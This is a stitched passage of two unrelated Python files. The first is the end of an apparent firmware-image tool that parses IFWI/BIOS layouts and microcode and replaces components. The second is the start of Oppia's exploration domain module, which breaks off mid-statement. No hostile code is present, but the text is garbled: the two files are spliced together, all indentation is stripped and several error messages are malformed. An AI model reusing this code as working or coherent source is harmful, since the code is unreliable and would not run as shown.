print ('Microcode %d:' % (idx + 1))
ucode_hdr = UCODE_HEADER.from_buffer(bin)
print (' Processor : %X' % (ucode_hdr.processor_signature))
print (' Revision : %X' % (ucode_hdr.update_revision))
month = (ucode_hdr.date & 0xFF000000) >> 24
day = (ucode_hdr.date & 0xFF0000) >> 16
year = ucode_hdr.date & 0xFFFF
print (' Date : %02X/%02X/%04X' % (month, day, year))
print (' Length : %X' % (ucode_hdr.total_size))
@staticmethod
def extract (bin, out_dir):
ucode_list = UCODE_PARSER.parse (bin)
for idx, bin in enumerate(ucode_list):
ucode_hdr = UCODE_HEADER.from_buffer(bin)
name = '%03d0_%08X_%08X.mcb' % (idx, ucode_hdr.processor_signature, ucode_hdr.update_revision)
path = os.path.join (out_dir, name)
gen_file_from_object (path, bin)
print ("%d microcode binaries were extraced to directory '%s' !" % (idx + 1, out_dir))
@staticmethod
def is_valid (ucode):
valid = True
ucode_hdr = UCODE_HEADER.from_buffer(ucode)
if ucode_hdr.header_version != 1:
print ('ERROR: Invalid header version !')
valid = False
if bytearray(ucode_hdr.reserved) != b'\x00' * 12:
print ('ERROR: Invalid reserved bytes !')
valid = False
if ucode_hdr.total_size % 1024 != 0:
print ('ERROR: Invalid total size !')
valid = False
data = ARRAY(c_uint32, ucode_hdr.total_size >> 2).from_buffer(ucode)
if (sum(data) & 0xffffffff) != 0:
print ('ERROR: Invalid checksum !')
valid = False
return valid
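    # Per the IA-32 microcode update format, total_size must be a multiple of
    # 1024 bytes and all 32-bit dwords of the update must sum to 0 mod 2^32,
    # which is exactly what is_valid() checks above.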
@staticmethod
def pack (ucode_files, out_file = None):
bins = bytearray()
if type(ucode_files) is type([]):
ucode_list = ucode_files
elif os.path.isdir(ucode_files):
ucode_list = [os.path.join(ucode_files, f) for f in sorted(os.listdir(ucode_files)) if f.endswith('.mcb')]
else:
return bins
for ucode in ucode_list:
bin = bytearray (get_file_data (ucode))
if UCODE_PARSER.is_valid (bin):
ucode_hdr = UCODE_HEADER.from_buffer(bin)
bins.extend (bin[:ucode_hdr.total_size])
else:
print ("Microcode file '%s' is ignored !" % ucode)
if out_file:
gen_file_from_object (out_file, bins)
return bins
@staticmethod
def parse (bin):
ucode = []
offset = 0
valid = True
while valid and (offset < len(bin)):
ucode_hdr = UCODE_HEADER.from_buffer(bin, offset)
if ucode_hdr.header_version == 0xffffffff:
break
            valid = UCODE_PARSER.is_valid (bin[offset:])
if valid:
ucode.append (bytearray(bin[offset:offset+ucode_hdr.total_size]))
offset += ucode_hdr.total_size
return ucode
class IFWI_PARSER:
def __init__(self):
return
@staticmethod
def is_ifwi_image(bios_bins):
spi_desc = SPI_DESCRIPTOR.from_buffer(bios_bins)
return spi_desc.fl_val_sig == spi_desc.DESC_SIGNATURE
@staticmethod
def locate_components(root, path):
result = []
nodes = path.split('/')
if len(nodes) < 1 or root.name != nodes[0]:
return []
if len(nodes) == 1:
return [root]
for comp in root.child:
ret = IFWI_PARSER.locate_components(comp, '/'.join(nodes[1:]))
if len(ret) > 0:
result.extend(ret)
return result
@staticmethod
def locate_component(root, path):
result = IFWI_PARSER.locate_components(root, path)
if len(result) > 0:
return result[0]
else:
return None
@staticmethod
def find_components(root, name, comp_type = COMPONENT.COMP_TYPE['FILE']):
result = []
if root.type == comp_type and root.name == name:
return [root]
for comp in root.child:
ret = IFWI_PARSER.find_components(comp, name, comp_type)
if len(ret) > 0:
result.extend(ret)
return result
@staticmethod
def get_component_path (comp):
path = []
while comp:
path.append (comp.name)
comp = comp.parent
return '/'.join(path[::-1])
@staticmethod
def print_tree(root, level=0):
if root is None:
return
print ("%-24s [O:0x%08X L:0x%08X]" % (' ' * level + root.name,
root.offset, root.length))
for comp in root.child:
level += 1
IFWI_PARSER.print_tree(comp, level)
level -= 1
bp = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0')
if bp:
print ("\nBPDT Space Information:")
for idx in range(2):
bp = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP%d' % idx)
if len(bp.child) > 1:
sbpdt = bp.child[1]
bplen = bp.length - ((sbpdt.offset + sbpdt.length) - bp.offset)
else:
bplen = bp.length
print (" BP%d Free Space: 0x%05X" % (idx, bplen))
@staticmethod
def find_ifwi_region (spi_descriptor, rgn_name):
frba = ((spi_descriptor.fl_map0 >> 16) & 0xFF) << 4
reg_off = spi_descriptor.FLASH_REGIONS[rgn_name]
fl_reg = reg_off + frba
rgn_off = c_uint32.from_buffer(spi_descriptor, fl_reg)
rgn_base = (rgn_off.value & 0x7FFF) << 12
rgn_limit = ((rgn_off.value & 0x7FFF0000) >> 4) | 0xFFF
if (reg_off > 0 and rgn_off.value == 0) or (rgn_off.value == 0xFFFFFFFF) or (rgn_limit <= rgn_base):
return None, None
else:
return (rgn_base, rgn_limit)
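    # Worked example for the decode above: with fl_map0 = 0x00040003 the flash
    # region base address is frba = ((0x00040003 >> 16) & 0xFF) << 4 = 0x40, and
    # a BIOS region register value of 0x0BFF0400 decodes to
    #   base  = (0x0400 & 0x7FFF) << 12                  = 0x00400000
    #   limit = ((0x0BFF0400 & 0x7FFF0000) >> 4) | 0xFFF = 0x00BFFFFF
    # i.e. the BIOS region spans 0x400000..0xBFFFFF of the SPI image.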
@staticmethod
def get_boot_partition_from_path (comp_path):
if '/RD0/' in comp_path or '/TS0/' in comp_path:
bp = 0
elif '/RD1/' in comp_path or '/TS1/' in comp_path:
bp = 1
else:
bp = 0
return bp
@staticmethod
def update_ucode_fit_entry (ifwi_bin, ucode_path):
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -2
# Get microcode
ucode_comps = IFWI_PARSER.locate_components (ifwi, ucode_path)
if len(ucode_comps) == 0:
print ("Cannot find microcode component in ifwi image!" % path)
return -3
# Get partition from path
bp = IFWI_PARSER.get_boot_partition_from_path (ucode_path)
# Get fit entry
path = 'IFWI/BIOS/TS%d/SG1A' % bp
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
            path = 'IFWI/BIOS/SG1A'
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find 'SG1A' in ifwi image!" % path)
return -4
img_base = 0x100000000 - len(ifwi_bin)
fit_addr = c_uint32.from_buffer(ifwi_bin, ifwi_comps[0].offset + ifwi_comps[0].length + FIT_ENTRY.FIT_OFFSET)
fit_offset = fit_addr.value - img_base
fit_header = FIT_ENTRY.from_buffer(ifwi_bin, fit_offset)
if fit_header.address != bytes_to_value (bytearray(FIT_ENTRY.FIT_SIGNATURE)):
print ("Cannot find FIT table !" % path)
return -4
# Update Ucode entry address
ucode_idx = 0
ucode_off = ucode_comps[0].offset
ucode_list = UCODE_PARSER.parse (ifwi_bin[ucode_off:])
for fit_type in [0x01, 0x7f]:
for idx in range(fit_header.size):
fit_entry = FIT_ENTRY.from_buffer(ifwi_bin, fit_offset + (idx + 1) * 16)
if fit_entry.type == fit_type:
if ucode_idx < len(ucode_list):
fit_entry.set_values(img_base + ucode_off, 0, 0x100, 0x1, 0)
ucode_off += len(ucode_list[ucode_idx])
ucode_idx += 1
else:
# more fit entry is available, clear this entry
fit_entry.type = 0x7f
if ucode_idx != len(ucode_list):
print ("Not all microcode can be listed in FIT table due to limited FIT entry number !")
return -5
# Update FIT checksum
fit_header.checksum = 0
fit_sum = sum(ifwi_bin[fit_offset:fit_offset+fit_header.size*16])
fit_header.checksum = (0 - fit_sum) & 0xff
return 0
@staticmethod
def replace_component (ifwi_bin, comp_bin, path):
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -2
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find path '%s' in ifwi image!" % path)
return -4
for ifwi_comp in ifwi_comps:
gap = len(comp_bin) - ifwi_comp.length
if gap > 0:
print ("Component image file is too big (0x%x vs 0x%x)!" % (ifwi_comp.length, len(comp_bin)))
return -5
elif gap < 0:
gap = -gap
print ("Padding 0x%x bytes at the end to fill the region '%s'" % (gap, ifwi_comp.name))
comp_bin.extend (b'\xff' * gap)
ifwi_bin[ifwi_comp.offset:ifwi_comp.offset + ifwi_comp.length] = \
comp_bin[0:ifwi_comp.length]
return 0
@staticmethod
def extract_component (ifwi_bin, comp_bin, path):
bins_comp = bytearray ()
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -1
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find path '%s' in ifwi image!" % path)
return -2
if len(ifwi_comps) > 1:
print ("Found multiple components for '%s'!" % path)
return -3
ifwi_comp = ifwi_comps[0]
comp_bin[:] = ifwi_bin[ifwi_comp.offset:ifwi_comp.offset + ifwi_comp.length]
return 0
@staticmethod
def bpdt_parser (bin_data, bpdt_offset, offset):
sub_part_list = []
idx = bpdt_offset + offset
bpdt_hdr = BPDT_HEADER.from_buffer(bytearray(bin_data[idx:idx + sizeof(BPDT_HEADER)]))
idx += sizeof(bpdt_hdr)
sbpdt = None
for desc in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(bytearray(bin_data[idx:idx + sizeof(BPDT_ENTRY)]))
idx += sizeof(bpdt_entry)
dir_list = []
if 'BpdtSbpdt' == str(bpdt_entry.type):
sbpdt = bpdt_entry
if bpdt_entry.sub_part_size > sizeof(SUBPART_DIR_HEADER):
part_idx = bpdt_offset + bpdt_entry.sub_part_offset
if part_idx > len(bin_data):
break
sub_part_dir_hdr = SUBPART_DIR_HEADER.from_buffer(
bytearray(bin_data[part_idx:part_idx + sizeof(
SUBPART_DIR_HEADER)]), 0)
part_idx += sizeof(sub_part_dir_hdr)
if b'$CPD' == sub_part_dir_hdr.header_marker:
for dir in range(sub_part_dir_hdr.num_of_entries):
part_dir = SUBPART_DIR_ENTRY.from_buffer(
bytearray(bin_data[part_idx:part_idx + sizeof(
SUBPART_DIR_ENTRY)]), 0)
part_idx += sizeof(part_dir)
dir_list.append(part_dir)
sub_part_list.append((bpdt_entry, dir_list))
return sub_part_list, sbpdt
@staticmethod
def parse_bios_bpdt (img_data):
offset = 0
bios_hdr = BIOS_ENTRY.from_buffer(img_data, offset)
if bios_hdr.name != "BIOS":
return None
bios_comp = COMPONENT(bios_hdr.name, COMPONENT.COMP_TYPE['RGN'], 0, len(img_data))
offset += sizeof(bios_hdr)
entry_num = bios_hdr.offset
for idx in range(entry_num):
part_entry = BIOS_ENTRY.from_buffer(img_data, offset)
part_comp = COMPONENT(part_entry.name, COMPONENT.COMP_TYPE['PART'],
part_entry.offset, part_entry.length)
bios_comp.add_child(part_comp)
sub_part_dir_hdr = SUBPART_DIR_HEADER.from_buffer(img_data,
part_entry.offset)
if b'$CPD' == sub_part_dir_hdr.header_marker:
for dir in range(sub_part_dir_hdr.num_of_entries):
part_dir = SUBPART_DIR_ENTRY.from_buffer(
img_data, part_entry.offset + sizeof(SUBPART_DIR_HEADER) +
sizeof(SUBPART_DIR_ENTRY) * dir)
dir_comp = COMPONENT(part_dir.entry_name, COMPONENT.COMP_TYPE['FILE'],
part_entry.offset + part_dir.entry_offset,
part_dir.entry_size)
part_comp.add_child(dir_comp)
offset += sizeof(part_entry)
return bios_comp
@staticmethod
def parse_bios_region (img_data, base_off = 0):
offset = bytes_to_value(img_data[-8:-4]) - (0x100000000 - len(img_data))
if offset <0 or offset >= len(img_data) - 0x10:
return None
fla_map_off = offset
if bytes_to_value(img_data[fla_map_off:fla_map_off+4]) != 0x504d4c46:
return None
bios_comp = COMPONENT('BIOS', COMPONENT.COMP_TYPE['RGN'], base_off, len(img_data))
curr_part = -1
fla_map_str = FLASH_MAP.from_buffer (img_data, fla_map_off)
entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
for idx in range (entry_num):
idx = entry_num - 1 - idx
desc = FLASH_MAP_DESC.from_buffer (img_data, fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
file_comp = COMPONENT(desc.sig.decode(), COMPONENT.COMP_TYPE['FILE'], desc.offset + base_off, desc.size)
if curr_part != desc.flags & 0x4F:
curr_part = desc.flags & 0x4F
part_comp = COMPONENT('%s' % (FLASH_MAP.FLASH_MAP_REGION[curr_part]), COMPONENT.COMP_TYPE['PART'], desc.offset + base_off, desc.size)
bios_comp.add_child (part_comp)
else:
part_comp.length += desc.size
part_comp.add_child(file_comp)
return bios_comp
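    # Note on the offset math above: the 32-bit flash-map pointer is stored 8
    # bytes from the end of the BIOS image as an address below 4 GB, so it is
    # converted to a file offset by subtracting (0x100000000 - len(img_data)).
    # 0x504d4c46 is simply b'FLMP' read as a little-endian 32-bit value.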
@staticmethod
def parse_ifwi_binary(img_data):
if len(img_data) < 0x1000:
return None
ifwi_comp = COMPONENT('IFWI', COMPONENT.COMP_TYPE['IFWI'], 0, len(img_data))
bios_comp = IFWI_PARSER.parse_bios_bpdt (img_data)
if bios_comp is not None:
ifwi_comp.add_child (bios_comp)
return ifwi_comp
spi_descriptor = SPI_DESCRIPTOR.from_buffer(img_data)
if spi_descriptor.fl_val_sig != spi_descriptor.DESC_SIGNATURE:
# no SPI descriptor, try to check the flash map
bios_comp = IFWI_PARSER.parse_bios_region (img_data, 0)
if bios_comp is not None:
ifwi_comp.add_child (bios_comp)
return ifwi_comp
# It is a full IFWI image
bios_comp = None
ifwi_comp = COMPONENT('IFWI', COMPONENT.COMP_TYPE['IFWI'], 0, len(img_data))
rgn_dict = sorted(SPI_DESCRIPTOR.FLASH_REGIONS, key=SPI_DESCRIPTOR.FLASH_REGIONS.get)
for rgn in rgn_dict:
rgn_start, rgn_limit = IFWI_PARSER.find_ifwi_region(spi_descriptor, rgn)
if rgn_start is None:
continue
rgn_comp = COMPONENT(rgn.upper(), COMPONENT.COMP_TYPE['RGN'], rgn_start, rgn_limit - rgn_start + 1)
if rgn == 'bios':
bios_comp = rgn_comp
else:
ifwi_comp.add_child (rgn_comp)
if bios_comp is None:
return None
bios_start = bios_comp.offset
bios_limit = bios_comp.offset + bios_comp.length - 1
if not (img_data[bios_start] == 0xAA and img_data[bios_start + 1] == 0x55):
# normal layout
new_bios_comp = IFWI_PARSER.parse_bios_region (img_data[bios_start:bios_limit+1], bios_start)
if new_bios_comp is not None:
bios_comp = new_bios_comp
ifwi_comp.add_child (bios_comp)
ifwi_comp.child.sort (key=lambda x: x.offset)
return ifwi_comp
# Sort region by offset
ifwi_comp.add_child (bios_comp)
ifwi_comp.child.sort (key=lambda x: x.offset)
# It is BPDT format
bp_offset = [bios_start, (bios_start + bios_limit + 1) // 2]
for idx, offset in enumerate(bp_offset):
bp_comp = COMPONENT('BP%d' % idx, COMPONENT.COMP_TYPE['BP'], offset,
(bios_limit - bios_start + 1) // 2)
sub_part_offset = 0
while True:
bpdt, sbpdt_entry = IFWI_PARSER.bpdt_parser(img_data, offset, sub_part_offset)
bpdt_prefix = '' if sub_part_offset == 0 else 'S'
bpdt_size = sbpdt_entry.sub_part_offset if sbpdt_entry else bpdt_comp.child[-1].length
bpdt_comp = COMPONENT('%sBPDT' % bpdt_prefix, COMPONENT.COMP_TYPE['BPDT'],
offset + sub_part_offset, bpdt_size)
sorted_bpdt = sorted(bpdt, key=lambda x: x[0].sub_part_offset)
for part, dir_list in sorted_bpdt:
if not part.sub_part_size:
continue
part_comp = COMPONENT(
str(part.type), COMPONENT.COMP_TYPE['PART'],
offset + part.sub_part_offset, part.sub_part_size)
sorted_dir = sorted(dir_list, key=lambda x: x.entry_offset)
for dir in sorted_dir:
file_comp = COMPONENT(dir.entry_name.decode(), COMPONENT.COMP_TYPE['FILE'],
part_comp.offset + dir.entry_offset,
dir.entry_size)
part_comp.add_child(file_comp)
bpdt_comp.add_child(part_comp)
bp_comp.add_child(bpdt_comp)
if sbpdt_entry:
sub_part_offset = sbpdt_entry.sub_part_offset
else:
break
bios_comp.add_child(bp_comp)
return ifwi_comp
if __name__ == '__main__':
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(title='commands')
parser_view = subparsers.add_parser('view', help='print IFWI component layout')
parser_view.set_defaults(which='view')
parser_view.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_replace = subparsers.add_parser('replace', help='replace component in IFWI')
parser_replace.set_defaults(which='replace')
parser_replace.add_argument('-f', '--component-image', dest='comp_image', type=str,
default = '', help="Specify component image file")
parser_replace.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_replace.add_argument('-o', '--output-image', dest='output_image', type=str,
default = '', help='Specify output IFWI image file path')
parser_replace.add_argument('-p', '--path', dest='component_path', type=str,
default = '', help='Specify replace path in IFWI image flashmap')
parser_replace.add_argument('-u', '--input-ucode-dir', dest='input_ucode_dir', type=str,
default = '', help="Specify a directory containing all microcode to pack if the '-p' path is a microcode component")
parser_extract = subparsers.add_parser('extract', help='extract component from IFWI')
parser_extract.set_defaults(which='extract')
parser_extract.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_extract.add_argument('-o', '--output-component', dest='output_image', type=str,
default = '', help='Specify output component image file path')
parser_extract.add_argument('-p', '--path', dest='component_path', type=str,
default = '', help='Specify component path to be extracted from IFWI image')
parser_extract.add_argument('-u', '--output-ucode-dir', dest='output_ucode_dir', type=str,
default = '', help="Specify a directory to store the extraced microcode binaries if the '-p' path is a microcode component")
args = parser.parse_args()
ifwi = None
ifwi_bin = bytearray (get_file_data (args.ifwi_image))
ret = -1
show = False
if args.which == 'view':
show = True
elif args.which == 'extract':
comp_bin = bytearray ()
if not args.component_path:
show = True
else:
ret = IFWI_PARSER.extract_component (ifwi_bin, comp_bin, args.component_path)
if ret == 0:
out_image = args.output_image
if out_image:
gen_file_from_object (out_image, comp_bin)
print ("Components @ %s was extracted successfully!" % args.component_path)
parts = args.component_path.split('/')
if len(parts) > 0 and parts[-1] == 'UCOD' and args.output_ucode_dir:
out_dir = args.output_ucode_dir
if not os.path.exists(out_dir):
os.mkdir (out_dir)
else:
if not os.path.isdir (out_dir):
parser.error('-u needs to be a directory !')
ucode = UCODE_PARSER ()
ucode.dump (comp_bin)
ucode.extract (comp_bin, out_dir)
elif args.which == 'replace':
if args.comp_image and args.input_ucode_dir:
parser_replace.error("Option '-f' and '-u' are exclusive !")
if not args.component_path:
show = True
else:
if args.input_ucode_dir:
parts = args.component_path.split('/')
if len(parts) > 0 and parts[-1] == 'UCOD':
comp_bin = UCODE_PARSER.pack (args.input_ucode_dir)
else:
parser_replace.error("Option '-p' needs to be a microcode component path !")
else:
if not args.comp_image:
parser_replace.error('Component image file is required when path is specified!')
comp_bin = bytearray (get_file_data (args.comp_image))
ret = IFWI_PARSER.replace_component (ifwi_bin, comp_bin, args.component_path)
if ret == 0:
if args.input_ucode_dir:
ret = IFWI_PARSER.update_ucode_fit_entry (ifwi_bin, args.component_path)
if ret == 0:
out_image = args.output_image if args.output_image else args.ifwi_image
gen_file_from_object (out_image, ifwi_bin)
print ("Components @ %s was replaced successfully!" % args.component_path)
if show:
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if ifwi:
IFWI_PARSER.print_tree (ifwi)
ret = 0
if ret != 0:
raise Exception ('Execution failed for %s !' % sys.argv[0])
sys.exit(ret)
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects for an exploration, its states, and their constituents.
Domain objects capture domain-specific logic and are agnostic of how the
objects they represent are stored. All methods and properties in this file
should therefore be independent of the specific storage models used.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import collections
import copy
import functools
import re
import string
from constants import constants
from core.domain import change_domain
from core.domain import html_validation_service
from core.domain import interaction_registry
from core.domain import param_domain
from core.domain import state_domain
from core.platform import models
import feconf
import python_utils
import utils
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
# Do not modify the values of these constants. This is to preserve backwards
# compatibility with previous change dicts.
# TODO(bhenning): Prior to July 2015, exploration changes involving rules were
# logged using the key 'widget_handlers'. These need to be migrated to
# 'answer_groups' and 'default_outcome'.
STATE_PROPERTY_PARAM_CHANGES = 'param_changes'
STATE_PROPERTY_CONTENT = 'content'
STATE_PROPERTY_SOLICIT_ANSWER_DETAILS = 'solicit_answer_details'
STATE_PROPERTY_RECORDED_VOICEOVERS = 'recorded_voiceovers'
STATE_PROPERTY_WRITTEN_TRANSLATIONS = 'written_translations'
STATE_PROPERTY_INTERACTION_ID = 'widget_id'
STATE_PROPERTY_INTERACTION_CUST_ARGS = 'widget_customization_args'
STATE_PROPERTY_INTERACTION_ANSWER_GROUPS = 'answer_groups'
STATE_PROPERTY_INTERACTION_DEFAULT_OUTCOME = 'default_outcome'
STATE_PROPERTY_UNCLASSIFIED_ANSWERS = (
'confirmed_unclassified_answers')
STATE_PROPERTY_INTERACTION_HINTS = 'hints'
STATE_PROPERTY_INTERACTION_SOLUTION = 'solution'
# Deprecated state properties.
STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED = (
'content_ids_to_audio_translations') # Deprecated in state schema v27.
# These four properties are kept for legacy purposes and are not used anymore.
STATE_PROPERTY_INTERACTION_HANDLERS = 'widget_handlers'
STATE_PROPERTY_INTERACTION_STICKY = 'widget_sticky'
GADGET_PROPERTY_VISIBILITY = 'gadget_visibility'
GADGET_PROPERTY_CUST_ARGS = 'gadget_customization_args'
# This takes additional 'title' and 'category' parameters.
CMD_CREATE_NEW = 'create_new'
# This takes an additional 'state_name' parameter.
CMD_ADD_STATE = 'add_state'
# This takes additional 'old_state_name' and 'new_state_name' parameters.
CMD_RENAME_STATE = 'rename_state'
# This takes an additional 'state_name' parameter.
CMD_DELETE_STATE = 'delete_state'
# This takes additional 'state_name', 'content_id', 'language_code' and
# 'content_html' and 'translation_html' parameters.
CMD_ADD_TRANSLATION = 'add_translation'
# This takes additional 'property_name' and 'new_value' parameters.
CMD_EDIT_STATE_PROPERTY = 'edit_state_property'
# This takes additional 'property_name' and 'new_value' parameters.
CMD_EDIT_EXPLORATION_PROPERTY = 'edit_exploration_property'
# This takes additional 'from_version' and 'to_version' parameters for logging.
CMD_MIGRATE_STATES_SCHEMA_TO_LATEST_VERSION = (
'migrate_states_schema_to_latest_version')
# These are categories to which answers may be classified. These values should
# not be changed because they are persisted in the data store within answer
# logs.
# Represents answers classified using rules defined as part of an interaction.
EXPLICIT_CLASSIFICATION = 'explicit'
# Represents answers which are contained within the training data of an answer
# group.
TRAINING_DATA_CLASSIFICATION = 'training_data_match'
# Represents answers which were predicted using a statistical training model
# from training data within an answer group.
STATISTICAL_CLASSIFICATION = 'statistical_classifier'
# Represents answers which led to the 'default outcome' of an interaction,
# rather than belonging to a specific answer group.
DEFAULT_OUTCOME_CLASSIFICATION = 'default_outcome'
class ExplorationChange(change_domain.BaseChange):
"""Domain object class for an exploration change.
IMPORTANT: Ensure that all changes to this class (and how these cmds are
interpreted in general) preserve backward-compatibility with the
exploration snapshots in the datastore. Do not modify the definitions of
cmd keys that already exist.
NOTE TO DEVELOPERS: Please note that, for a brief period around
Feb - Apr 2017, change dicts related to editing of answer groups
accidentally stored the old_value using a ruleSpecs key instead of a
rule_specs key. So, if you are making use of this data, make sure to
verify the format of the old_value before doing any processing.
The allowed commands, together with the attributes:
- 'add_state' (with state_name)
- 'rename_state' (with old_state_name and new_state_name)
- 'delete_state' (with state_name)
- 'edit_state_property' (with state_name, property_name,
new_value and, optionally, old_value)
- 'edit_exploration_property' (with property_name,
new_value and, optionally, old_value)
- 'migrate_states_schema' (with from_version, to_version)
For a state, property_name must be one of STATE_PROPERTIES.
For an exploration, property_name must be one of
EXPLORATION_PROPERTIES.
"""
# The allowed list of state properties which can be used in
# edit_state_property command.
STATE_PROPERTIES = (
STATE_PROPERTY_PARAM_CHANGES,
STATE_PROPERTY_CONTENT,
STATE_PROPERTY_SOLICIT_ANSWER_DETAILS,
STATE_PROPERTY_RECORDED_VOICEOVERS,
STATE_PROPERTY_WRITTEN_TRANSLATIONS,
STATE_PROPERTY_INTERACTION_ID,
STATE_PROPERTY_INTERACTION_CUST_ARGS,
STATE_PROPERTY_INTERACTION_STICKY,
STATE_PROPERTY_INTERACTION_HANDLERS,
STATE_PROPERTY_INTERACTION_ANSWER_GROUPS,
STATE_PROPERTY_INTERACTION_DEFAULT_OUTCOME,
STATE_PROPERTY_INTERACTION_HINTS,
STATE_PROPERTY_INTERACTION_SOLUTION,
STATE_PROPERTY_UNCLASSIFIED_ANSWERS,
# Deprecated state properties.
STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED)
# The allowed list of exploration properties which can be used in
# edit_exploration_property command.
EXPLORATION_PROPERTIES = (
'title', 'category', 'objective', 'language_code', 'tags',
'blurb', 'author_notes', 'param_specs', 'param_changes',
'init_state_name', 'auto_tts_enabled', 'correctness_feedback_enabled')
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': ['category', 'title'],
'optional_attribute_names': []
}, {
'name': CMD_ADD_STATE,
'required_attribute_names': ['state_name'],
'optional_attribute_names': []
}, {
'name': CMD_DELETE_STATE,
'required_attribute_names': ['state_name'],
'optional_attribute_names': []
}, {
'name': CMD_RENAME_STATE,
'required_attribute_names': ['new_state_name', 'old_state_name'],
'optional_attribute_names': []
}, {
'name': CMD_ADD_TRANSLATION,
'required_attribute_names': [
'state_name', 'content_id', 'language_code', 'content_html',
'translation_html'],
'optional_attribute_names': []
}, {
'name': CMD_EDIT_STATE_PROPERTY,
'required_attribute_names': [
'property_name', 'state_name', 'new_value'],
'optional_attribute_names': ['old_value'],
'allowed_values': {'property_name': STATE_PROPERTIES}
}, {
'name': CMD_EDIT_EXPLORATION_PROPERTY,
'required_attribute_names': ['property_name', 'new_value'],
'optional_attribute_names': ['old_value'],
'allowed_values': {'property_name': EXPLORATION_PROPERTIES}
}, {
'name': CMD_MIGRATE_STATES_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': exp_models.ExplorationModel.CMD_REVERT_COMMIT,
'required_attribute_names': ['version_number'],
'optional_attribute_names': []
}]
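    # For illustration only (not an exhaustive reference): a change that renames
    # a state is validated against the CMD_RENAME_STATE entry above and could be
    # built from a dict such as
    #
    #     ExplorationChange({
    #         'cmd': 'rename_state',
    #         'old_state_name': 'Introduction',
    #         'new_state_name': 'Welcome',
    #     })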
class ExplorationCommitLogEntry(python_utils.OBJECT):
"""Value object representing a commit to an exploration."""
def __init__(
self, created_on, last_updated, user_id, username, exploration_id,
commit_type, commit_message, commit_cmds, version,
post_commit_status, post_commit_community_owned,
post_commit_is_private):
"""Initializes a ExplorationCommitLogEntry domain object.
Args:
created_on: datetime.datetime. Date and time when the exploration
commit was created.
last_updated: datetime.datetime. Date and time when the exploration
commit was last updated.
user_id: str. User id of the user who has made the commit.
username: str. Username of the user who has made the commit.
exploration_id: str. Id of the exploration.
commit_type: str. The type of commit.
commit_message: str. A description of changes made to the
exploration.
commit_cmds: list(dict). A list of commands, describing changes
made in this model, which should give sufficient information to
reconstruct the commit. Each dict always contains the following
key:
- cmd: str. Unique command.
and then additional arguments for that command.
version: int. The version of the exploration after the commit.
post_commit_status: str. The new exploration status after the
commit.
post_commit_community_owned: bool. Whether the exploration is
community-owned after the edit event.
post_commit_is_private: bool. Whether the exploration is private
after the edit event.
"""
self.created_on = created_on
self.last_updated = last_updated
self.user_id = user_id
self.username = username
self.exploration_id = exploration_id
self.commit_type = commit_type
self.commit_message = commit_message
self.commit_cmds = commit_cmds
self.version = version
self.post_commit_status = post_commit_status
self.post_commit_community_owned = post_commit_community_owned
self.post_commit_is_private = post_commit_is_private
def to_dict(self):
"""Returns a dict representing this ExplorationCommitLogEntry domain
object. This omits created_on, user_id and commit_cmds.
Returns:
dict. A dict, mapping all fields of ExplorationCommitLogEntry
instance, except created_on, user_id and commit_cmds fields.
"""
return {
'last_updated': utils.get_time_in_millisecs(self.last_updated),
'username': self.username,
'exploration_id': self.exploration_id,
'commit_type': self.commit_type,
'commit_message': self.commit_message,
'version': self.version,
'post_commit_status': self.post_commit_status,
'post_commit_community_owned': self.post_commit_community_owned,
'post_commit_is_private': self.post_commit_is_private,
}
class ExpVersionReference(python_utils.OBJECT):
"""Value object representing an exploration ID and a version number."""
def __init__(self, exp_id, version):
"""Initializes an ExpVersionReference domain object.
Args:
exp_id: str. ID of the exploration.
version: int. Version of the exploration.
"""
self.exp_id = exp_id
self.version = version
self.validate()
def to_dict(self):
"""Returns a dict representing this ExpVersionReference domain object.
Returns:
dict. A dict, mapping all fields of ExpVersionReference instance.
"""
return {
'exp_id': self.exp_id,
'version': self.version
}
def validate(self):
"""Validates properties of the ExpVersionReference.
Raises:
ValidationError: One or more attributes of the ExpVersionReference
are invalid.
"""
if not isinstance(self.exp_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected exp_id to be a str, received %s' % self.exp_id)
if not isinstance(self.version, int):
raise utils.ValidationError(
